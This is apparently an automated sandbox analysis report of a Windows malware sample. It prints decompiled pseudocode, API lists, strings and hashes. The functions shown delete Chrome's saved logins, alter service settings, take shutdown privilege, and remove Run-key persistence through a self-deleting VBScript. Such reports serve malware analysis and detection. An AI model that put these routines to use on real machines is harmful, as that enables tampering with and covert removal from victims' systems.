                                            • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                            • String ID:
                                            • API String ID: 1504175218-0
                                            • Opcode ID: 17dd7dad7d76beca9f7284d15ee3ca3d0f542796e997043edaac55f82b451752
                                            • Instruction ID: 10503f0b07f12a152b74f40201cb0c29060650093be0941fbdddf29287ef40aa
                                            • Opcode Fuzzy Hash: 17dd7dad7d76beca9f7284d15ee3ca3d0f542796e997043edaac55f82b451752
                                            • Instruction Fuzzy Hash: 37714C72A0020AAFCF15EFA4E898DEE7B7CEF24305F444119F516E2194EB35B649CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C0145, Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 013C0153
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6F525DF0), ref: 013C016E
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 013C017F
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 013C018F
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 013C019F
                                            • StrToIntA.SHLWAPI(00000000), ref: 013C01A6
                                              • Part of subcall function 013BF5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013BF622
                                              • Part of subcall function 013BF5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(013CC0C8), ref: 013BF65F
                                              • Part of subcall function 013BF5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BF91A
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 013C01CC
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 013C01DA
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 013C01ED
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 013C0200
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0347
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0350
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                            • String ID:
                                            • API String ID: 1196022968-0
                                            • Opcode ID: 228695d61783680973212f72723c0c2f8ab516ce00f729ebb4e9e43a548efa2f
                                            • Instruction ID: 35d78315555ebd14afe42dc6192f0995a41f1d392366e37ad4e3e2a1cae17e62
                                            • Opcode Fuzzy Hash: 228695d61783680973212f72723c0c2f8ab516ce00f729ebb4e9e43a548efa2f
                                            • Instruction Fuzzy Hash: D3614B79D00248EFCF15DFE8D884AEDBBBAFB19704F004195F102A6264DB356A59CF11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B710F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 32%
                                            			E013B710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L013C4170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E013B7A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E013B7A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                            0x013b7124
                                            0x013b712f
                                            0x013b7136
                                            0x013b713a
                                            0x013b7145
                                            0x013b714e
                                            0x013b715d
                                            0x013b71b1
                                            0x013b71b7
                                            0x013b71bf
                                            0x013b71c1
                                            0x013b71c4
                                            0x00000000
                                            0x013b71ca
                                            0x013b7166
                                            0x013b7167
                                            0x013b719c
                                            0x013b7178
                                            0x013b717e
                                            0x013b7184
                                            0x013b718f
                                            0x00000000
                                            0x013b7195
                                            0x013b716a
                                            0x013b7173
                                            0x00000000
                                            0x013b7176
                                            0x013b716c
                                            0x00000000

                                            APIs
                                            • getenv.MSVCRT ref: 013B7124
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 013B712F
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013B713A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B7145
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B714E
                                            • DeleteFileA.KERNEL32(00000000), ref: 013B7155
                                            • GetLastError.KERNEL32 ref: 013B715F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 013B717E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B718F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 013B71B1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B71C4
                                            Strings
                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 013B7119
                                            • [Chrome StoredLogins found, cleared!], xrefs: 013B71AC
                                            • [Chrome StoredLogins not found], xrefs: 013B7179
                                            • UserProfile, xrefs: 013B711F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                            • API String ID: 3740952235-1062637481
                                            • Opcode ID: 5154ffac6fa70a7bf800f44fa30ab68306cab317cfa866b0479b400801411ce5
                                            • Instruction ID: 6a1f3d47809061262246aca9b373acae73d4af3899a17475662c5459b764481a
                                            • Opcode Fuzzy Hash: 5154ffac6fa70a7bf800f44fa30ab68306cab317cfa866b0479b400801411ce5
                                            • Instruction Fuzzy Hash: 3B115175B0020AAFDB10BBA4D95E9FE7B3CEB54609F400015E902E2694FB71BA058BB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C1927, Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 48%
                                            			E013C1927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                            0x013c192d
                                            0x013c1933
                                            0x013c193e
                                            0x013c1940
                                            0x013c194e
                                            0x013c1952
                                            0x013c1961
                                            0x013c1964
                                            0x013c1966
                                            0x013c1976
                                            0x00000000
                                            0x013c1968
                                            0x013c1968
                                            0x013c1969
                                            0x013c1972
                                            0x00000000
                                            0x013c196b
                                            0x013c196c
                                            0x013c196e
                                            0x013c1978
                                            0x013c1978
                                            0x013c1978
                                            0x013c196c
                                            0x013c1969
                                            0x013c1995
                                            0x013c1998
                                            0x013c199b
                                            0x013c1954
                                            0x013c1955
                                            0x013c1955
                                            0x013c19a0
                                            0x013c19ac

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,Function_0001B310,?,?,013C0FD9), ref: 013C1933
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,013C0FD9), ref: 013C1940
                                            • OpenServiceW.ADVAPI32(00000000,00000000,?,?,013C0FD9), ref: 013C1948
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,013C0FD9), ref: 013C1955
                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,013C0FD9), ref: 013C1986
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,013C0FD9), ref: 013C1998
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,013C0FD9), ref: 013C199B
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,013C0FD9), ref: 013C19A0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                            • String ID:
                                            • API String ID: 760094045-0
                                            • Opcode ID: 6ae6b211d1e629196cf13297af419467bd2ac9c645056ca882c0a2dea93cd0cc
                                            • Instruction ID: a921e5c3fa70abd7b43dae70ceb85efaec16b6d57a4e4c3f0e01ff3b5180a04c
                                            • Opcode Fuzzy Hash: 6ae6b211d1e629196cf13297af419467bd2ac9c645056ca882c0a2dea93cd0cc
                                            • Instruction Fuzzy Hash: 7401B132240139BFE7201A349C89EFA3B6CEF41BB5F440319F626D60C6CA606D4197E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BEC0F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E013BEC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                            0x013bec23
                                            0x013bec35
                                            0x013bec46
                                            0x013bec4d
                                            0x013bec54
                                            0x013bec5a
                                            0x013bec62
                                            0x013bec68

                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000028,?,013CB310,?,?,?,?,?,013BDF86), ref: 013BEC1C
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,013BDF86), ref: 013BEC23
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 013BEC35
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 013BEC54
                                            • GetLastError.KERNEL32 ref: 013BEC5A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                            • String ID: SeShutdownPrivilege
                                            • API String ID: 3534403312-3733053543
                                            • Opcode ID: 45306e3b1ac1649190b4f9682e65839ec0724d5de38a271ad10fbb5f8cc2d787
                                            • Instruction ID: f66a772f5809b416403b7771ca142fd9cf45d8b912a0d39d0d0c27f9ca00feff
                                            • Opcode Fuzzy Hash: 45306e3b1ac1649190b4f9682e65839ec0724d5de38a271ad10fbb5f8cc2d787
                                            • Instruction Fuzzy Hash: 9EF012B1A42129AFDB20ABA1ED0DAEF7EACEB05704F500010F906E1144CA706A088BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5156, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013B5156(void* __ecx) {
				signed int _t3;
				signed int _t4;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;

				_t8 = __ecx;
				_t3 = GetKeyboardLayout(0);
				_t4 = _t3 & 0x000003ff;
				_t6 = 9;
				if(_t4 == _t6) {
					L3:
					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
					return _t4;
				} else {
					_t7 = 0x10;
					if(_t4 != _t7) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
						return _t4;
					}
				}
			}








                                            0x013b5157
                                            0x013b515b
                                            0x013b5163
                                            0x013b5168
                                            0x013b516c
                                            0x013b517b
                                            0x013b517b
                                            0x013b517f
                                            0x013b516e
                                            0x013b5170
                                            0x013b5174
                                            0x00000000
                                            0x013b5176
                                            0x013b5176
                                            0x013b517a
                                            0x013b517a
                                            0x013b5174

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayout
                                            • String ID:
                                            • API String ID: 194098044-0
                                            • Opcode ID: 4fdc24c5238e6f656a37b1dcd22dd59c3d413850f9b72de9f77c463ab327c36f
                                            • Instruction ID: 4dcea24b282c7336832ff76b851dab29d549bd0363b7f97f53182b7d0eeede8c
                                            • Opcode Fuzzy Hash: 4fdc24c5238e6f656a37b1dcd22dd59c3d413850f9b72de9f77c463ab327c36f
                                            • Instruction Fuzzy Hash: 54D05E76A487200EEB64A61CB8827E03684EB84721F95842AE7820AD94F59074C20254
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B85AC, Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 20%
                                            			E013B85AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E013BAC8C();
				if( *0x13cb154 != 0x30) {
					_t63 = E013B6D41(0x13cb900);
				}
				if( *0x13cc118 == 1) {
					_t63 = E013C050F(_t63);
				}
				if( *0x13cb22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E013C2BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x13cba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E013BB9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x13cbc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E013BB9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x13cba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E013BB9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E013BB692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x13cbc68, 0x13c5800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L013C4146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L013C416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L013C416A();
					_t90 =  &_v24;
					L013C4146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L013C4146();
				_t76 =  &_v56;
				L013C4146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x13cbc68, 0x13c5800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L013C416A();
					_t86 =  &_v56;
					L013C4146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x13cbc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L013C414C();
				_t81 =  &_v72;
				L013C414C();
				_t82 =  &_v56;
				L013C4146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E013C2D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x13c5800, 0x13c5800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                            0x013b85b5
                                            0x013b85c1
                                            0x013b85c8
                                            0x013b85c8
                                            0x013b85d4
                                            0x013b85d6
                                            0x013b85d6
                                            0x013b85e2
                                            0x013b85e9
                                            0x013b85f0
                                            0x013b85f5
                                            0x013b8605
                                            0x013b860f
                                            0x013b8613
                                            0x013b861c
                                            0x013b8621
                                            0x013b8621
                                            0x013b862b
                                            0x013b862f
                                            0x013b863c
                                            0x013b8641
                                            0x013b8641
                                            0x013b864b
                                            0x013b864f
                                            0x013b8660
                                            0x013b8665
                                            0x013b8665
                                            0x013b866f
                                            0x013b8678
                                            0x013b8698
                                            0x013b86a0
                                            0x013b86a5
                                            0x013b86aa
                                            0x013b86b6
                                            0x013b86b6
                                            0x013b86be
                                            0x013b86c6
                                            0x013b86df
                                            0x013b86e3
                                            0x013b86e7
                                            0x013b86e9
                                            0x013b86e9
                                            0x013b86f7
                                            0x013b8701
                                            0x013b8709
                                            0x013b8710
                                            0x013b8710
                                            0x013b8712
                                            0x013b8720
                                            0x013b872b
                                            0x013b8736
                                            0x013b8741
                                            0x013b8747
                                            0x013b8753
                                            0x013b8763
                                            0x013b8768
                                            0x013b876e
                                            0x013b8778
                                            0x013b8783
                                            0x013b878d
                                            0x013b8794
                                            0x013b879d
                                            0x013b87a6
                                            0x013b87aa
                                            0x013b87af
                                            0x013b87b6
                                            0x013b87bf
                                            0x013b87c8
                                            0x013b87d1
                                            0x013b87d1
                                            0x013b87d7
                                            0x013b87e4
                                            0x013b87f0
                                            0x013b87f7
                                            0x013b87fb
                                            0x013b8804
                                            0x013b8808
                                            0x013b880d
                                            0x013b8814
                                            0x013b881d
                                            0x013b8826
                                            0x013b882f
                                            0x013b8839
                                            0x013b8843
                                            0x013b8843
                                            0x013b8850
                                            0x013b885a
                                            0x013b885e
                                            0x013b8867
                                            0x013b8870
                                            0x013b8874
                                            0x013b8879
                                            0x013b8880
                                            0x013b8889
                                            0x013b8892
                                            0x013b8892
                                            0x013b8898
                                            0x013b88a9
                                            0x013b88b4
                                            0x013b88c0
                                            0x013b88c7
                                            0x013b88cb
                                            0x013b88d4
                                            0x013b88d8
                                            0x013b88e1
                                            0x013b88e5
                                            0x013b88f1
                                            0x013b88fa
                                            0x013b8903
                                            0x013b890c
                                            0x013b8915
                                            0x013b891e
                                            0x013b892c
                                            0x013b8938
                                            0x013b8942
                                            0x013b894e
                                            0x013b8955
                                            0x013b895f
                                            0x013b8967
                                            0x013b8974
                                            0x013b897d
                                            0x013b8980
                                            0x013b8980
                                            0x013b897d
                                            0x013b8989
                                            0x013b8992
                                            0x013b899b
                                            0x013b89a5

                                            APIs
                                              • Part of subcall function 013BAC8C: TerminateProcess.KERNEL32(00000000,013C66F0,013B9E75), ref: 013BAC9C
                                              • Part of subcall function 013BAC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 013BACAF
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B85E9
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B8613
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B862F
